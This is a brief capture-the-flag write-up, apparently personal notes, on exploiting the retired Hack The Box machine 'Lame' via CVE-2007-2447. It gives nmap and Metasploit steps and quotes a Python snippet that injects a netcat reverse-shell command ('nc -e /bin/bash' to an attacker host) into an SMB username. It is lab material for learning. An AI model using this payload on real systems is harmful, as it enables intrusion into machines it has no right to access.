Skip to content

Back

Lame

CVE-2007-2447 Lame is an easy Linux machine, requiring only one exploit to obtain root access. It was the first machine published on Hack The Box and was often the first machine for new users prior to its retirement.

  • nmap top 1000 ports - nmap -A -Pn -sS -oN lame 10.10.10.3
  • search (searchsploit vsFTPd 2.3.4) and try to exploit FTP server with msfconsole -> use exploit/unix/ftp/vsftpd_234_backdoor
  • same for Samba smbd 3.0.20
  • for digging further HTB suggestion to explore the 0xdf write-up

[!tip] Don't forget:

  • set LHOST
  • make it pretty - python -c 'import pty; pty.spawn("bash")'

From GitHub - MikeRega7/CVE-2007-2447-RCE: Samba 3.0.20:

 payload = "`nohup nc -e /bin/bash {} {} &`".format(lhost, lport)
 username = "/=" + payload
 conn = SMBConnection(username, "", "", "")